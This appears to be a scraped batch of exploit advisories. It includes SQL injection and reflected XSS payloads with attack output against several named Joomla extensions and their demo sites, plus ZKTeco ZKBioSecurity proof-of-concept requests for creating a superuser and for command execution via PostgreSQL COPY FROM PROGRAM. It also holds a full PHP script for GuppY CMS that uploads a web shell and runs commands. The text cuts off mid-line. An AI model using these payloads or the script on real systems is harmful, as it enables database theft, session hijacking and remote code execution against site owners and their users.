<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : GeneticsPro - jkassa.com │<br />│ Software : Joomla JKassa ShoppingCart 2.0.0 │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/men/sweatshirts.feed<br /><br />GET parameter 'manufacturer' is vulnerable<br /><br />---<br />Parameter: manufacturer (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom<br />---<br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br /><br />web application technology: Nginx, PHP 7.4.16<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br />current database: 'jkassa_umarket'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomTech - joomtech.net │<br />│ Software : Joomla Easy Shop 1.4.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path:/supermarket/index.php<br /><br />GET parameter 'file' is vulnerable to XSS<br /><br />https://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomlaUX - joomlaux.com │<br />│ Software : JUX Charity Hub 1.0.4 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causes<br /><br />GET parameter 'title' is vulnerable<br /><br />---<br />Parameter: title (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br />---<br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP 7.3.19<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: 'joomlaux_charityhub2'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>#######################ADVISORY INFORMATION#######################<br /><br />Product: ZKSecurity BIO<br /><br />Vendor: ZKTeco<br /><br />Version Affected: 3.0.5.0_R<br /><br />CVE: CVE-2022-36634<br /><br />Vulnerability: User privilege escalation<br /><br />#######################CREDIT#######################<br /><br />This vulnerability was discovered and researched by Caio Burgardt and<br />Silton Santos.<br /><br />#######################INTRODUCTION#######################<br /><br />Based on the hybrid biometric technology and computer vision technology,<br />ZKBioSecurity provides a comprehensive web-based security platform. It<br />contains multiple integrated modules: personnel, time & attendance, access<br />control, visitor management, offline & online consumption management, guard<br />patrol, parking, elevator control, entrance control, Facekiosk, intelligent<br />video management, mask and temperature detection module, and other smart<br />sub-systems.<br /><br />#######################VULNERABILITY DETAILS#######################<br /><br />The application's access control management does not check the session's<br />permissions correctly. An attacker with "Person Self-Login" or "User"<br />privilege can create a super user with full privileges in the application<br /><br />#######################PROOF OF CONCEPT#######################<br /><br />POST /authUserAction!edit.action HTTP/1.1<br /><br />Host: {HOST}<br /><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br /><br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br /><br />Accept-Language: en-US,en;q=0.5<br /><br />Accept-Encoding: gzip, deflate<br /><br />Content-Type: multipart/form-data;<br />boundary=---------------------------291763244192371568695079347<br /><br />Content-Length: 1956<br /><br />Origin: http://{HOST}:8088<br /><br />Connection: close<br /><br />Referer: http://{HOST}:8088/base_index.action<br /><br />Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE><br /><br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.username"<br /><br /><br /><br /><br /><br />test_privesc<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.loginPwd"<br /><br /><br /><br /><br /><br />KDla123<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="repassword"<br /><br /><br /><br /><br /><br />KDla123<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.isActive"<br /><br /><br /><br /><br /><br />true<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.isSuperuser"<br /><br /><br /><br /><br /><br />true<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="groupIds"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="deptIds"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="areaIds"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.email"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.name"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="authUser.lastName"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="fingerTemplate"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="fingerId"<br /><br /><br /><br /><br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="logMethod"<br /><br /><br /><br /><br /><br />add<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="un"<br /><br /><br /><br /><br /><br />1657813612925_286<br /><br />-----------------------------291763244192371568695079347<br /><br />Content-Disposition: form-data; name="systemCode"<br /><br /><br /><br /><br /><br />base<br /><br />-----------------------------291763244192371568695079347--<br /><br /><br /><br /><br /><br />#######################END#######################<br /><br /></code></pre>
<pre><code>#######################ADVISORY INFORMATION#######################<br /><br />Product: ZKSecurity BIO<br /><br />Vendor: ZKTeco (<br />https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)<br /><br />Version Affected: 4.1.2<br /><br />CVE: CVE-2022-36635<br /><br />Vulnerability: SQL Injection (with a plus: RCE)<br /><br />#######################CREDIT#######################<br /><br />This vulnerability was discovered and researched by Caio Burgardt and<br />Silton Santos.<br /><br />#######################INTRODUCTION#######################<br /><br />Based on the hybrid biometric technology and computer vision technology,<br />ZKBioSecurity provides a comprehensive web-based security platform. It<br />contains multiple integrated modules: personnel, time & attendance, access<br />control, visitor management, offline & online consumption management, guard<br />patrol, parking, elevator control, entrance control, Facekiosk, intelligent<br />video management, mask and temperature detection module, and other smart<br />sub-systems.<br /><br />#######################VULNERABILITY DETAILS#######################<br /><br />The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL<br />query, with only a sanitization filter in front of it. Using comments<br />(/**/) in place of spaces was enough to confuse and bypass the filter.<br /><br />#######################PROOF OF CONCEPT#######################<br /><br />Note that the request delayed 10s:<br /><br />POST /baseOpLog.do HTTP/1.1<br /><br />Host: {HOST}<br /><br />Content-Type: application/x-www-form-urlencoded<br /><br />Cookie: SESSION={COOKIE}; menuType=icon-only<br /><br />Content-Length: 208<br /><br />list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50<br /><br />if you use the next query, you can execute remote command:<br /><br />list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='<br /><br /><br />#######################END#######################<br /><br /></code></pre>
<pre><code># Exploit Title: GuppY 6.00.10 CMS Remote Code Execution<br /># Date: Sep 30, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.freeguppy.org/<br /># Software Link:<br />https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2<br /># Version: 6.00.10<br /># Tested on: Linux<br /><br />#!/usr/bin/php<br /><br /><?php<br /><br />$username = "Admin"; //Administrator username<br />$password = "rose1337"; //Administrator password<br /><br /><br />$options = getopt('u:c:');<br /><br />if(!isset($options['u'], $options['c']))<br />die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi<br />\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n<br /><br />\n");<br /><br />$target = $options['u'];<br /><br />$command = $options['c'];<br /><br />// Administrator login<br /><br />$cookie="cookie.txt";<br />$url = "{$target}guppy/connect.php";<br /><br />$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;<br />$curlObj = curl_init();<br /><br />curl_setopt($curlObj, CURLOPT_URL, $url);<br />curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);<br />curl_setopt($curlObj, CURLOPT_HEADER, 1);<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);<br />curl_setopt ($curlObj, CURLOPT_POST, 1);<br />CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);<br />CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);<br />CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);<br />CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);<br />curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");<br />curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");<br />$result = curl_exec($curlObj);<br /><br /><br />// uploading shell<br /><br />$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";<br /><br />$post='------WebKitFormBoundarygA1APFcUlkIaWal4<br />Content-Disposition: form-data; name="rep"<br /><br />file<br />------WebKitFormBoundarygA1APFcUlkIaWal4<br />Content-Disposition: form-data; name="ficup"; filename="shell.php"<br />Content-Type: application/x-php<br /><br /><?php system($_GET["cmd"]); ?><br /><br />------WebKitFormBoundarygA1APFcUlkIaWal4--<br />';<br /><br />$headers = array(<br /><br /><br /> 'Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',<br /><br /> 'Accept-Encoding: gzip, deflate',<br /> 'Accept-Language: en-US,en;q=0.9'<br />);<br />curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);<br />curl_setopt($curlObj, CURLOPT_URL, $url2);<br />curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);<br />curl_setopt($curlObj, CURLOPT_POST, true);<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);<br />CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);<br />CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);<br />CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);<br />CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);<br />curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");<br />curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");<br /><br />$data = curl_exec($curlObj);<br /><br /><br />// Executing the shell<br /><br /><br />$shell = "{$target}guppy/file/shell.php?cmd=" .$command;<br />curl_setopt($curlObj, CURLOPT_URL, $shell);<br />curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:<br />application/x-www-form-urlencoded'));<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);<br />CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);<br />curl_setopt($curlObj, CURLOPT_HEADER, False);<br />curl_setopt($curlObj, CURLOPT_POST, false);<br /><br />$exec_shell = curl_exec($curlObj);<br /><br />$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);<br /><br />if($code != 200) {<br /> echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the<br />credentials\n";<br />}<br />else {<br /><br />print("\n");<br />print($exec_shell);<br /><br />}<br />curl_close($curlObj);<br /><br />?><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Gordon Fisch - joomlamymuse.com │<br />│ Software : MyMuse 4.3.0 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php/en/mymuse-views/list-of-tracks?filter_alpha=A<br /><br />GET parameter 'filter_alpha' is vulnerable<br /><br />---<br />Parameter: filter_alpha (GET)<br /> Type: boolean-based blind<br /> Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br /> Payload: filter_alpha=A%' AND MAKE_SET(5052=5052,3360) AND 'xQKG%'='xQKG&filter_order=a.title ASC&limit=10&start=10<br /><br /> Type: error-based<br /> Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)<br /> Payload: filter_alpha=A%' AND EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671,(SELECT (ELT(2078=2078,1))),0x71627a7671)) AND 'QXSg%'='QXSg&filter_order=a.title ASC&limit=10&start=10<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: filter_alpha=A%' AND (SELECT 5976 FROM (SELECT(SLEEP(5)))vLkv) AND 'tLCw%'='tLCw&filter_order=a.title ASC&limit=10&start=10<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.1<br />[INFO] fetching current database<br />INFO] retrieved: '*********'<br />current database: ''*********''<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joom Sky - joomsky.com │<br />│ Software : JS Jobs Pro 1.3.6 JobPortal for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : POST │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /js-jobs/jm/pro/index.php/employer-control-panel/resume-search-results<br /><br /><br />POST parameter 'nationality' is vulnerable<br /><br />---<br />Parameter: nationality (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace<br /> Payload: title=&name=&nationality=(CASE WHEN (5462=5462) THEN SLEEP(5) ELSE 5462 END)&gender=&jobcategory=&jobsubcategory=&jobtype=&currency=&jobsalaryrange=&heighestfinisheducation=&experiencemin=&experiencemax=&keywords=&submit_app=Resume Search&isresumesearch=1&view=resume&layout=resume_searchresults&uid=0&option=com_jsjobs&task11=view<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: LiteSpeed<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: 'demjomsk_jmjsjobs'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joobi │<br />│ Software : jMarket 5.15 Multi-Vendor Shopping Cart for Joomla │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'controller' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-resultsqmzro%22onmouseover=%22alert(1)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22rqo95my69wy<br /><br />GET parameter 'trucs%5Bx%5D%5Bsearch%5D' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=gx3vt%20onfocus%3dalert(1)%20autofocus%3d%20itkrzsug7w5&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br />GET parameter 'vWjx' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=home&wajx=1&wmjx=1&tmpl=component&type=raw&limitstartw44_a45a2eb907d344c4d11b95b39a363661=20&vWjx=sabif%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20ax650sfkaze&vWdjx=44&fRmjx=wf_catalog_results_catalog_search_results&trucs%5Bx%5D%5Bsearch%5D=Search...&choicesorting=newest&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&limitstartw44_a45a2eb907d344c4d11b95b39a363661=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWw%3D<br /><br />GET parameter 'Itemid' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=is9fk%20onfocus%3dalert(1)%20autofocus%3d%20f7adumy8lgl&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br />GET parameter 'trucs%5B182%5D%5Bpid%5D' is vulnerable to XSS<br /><br 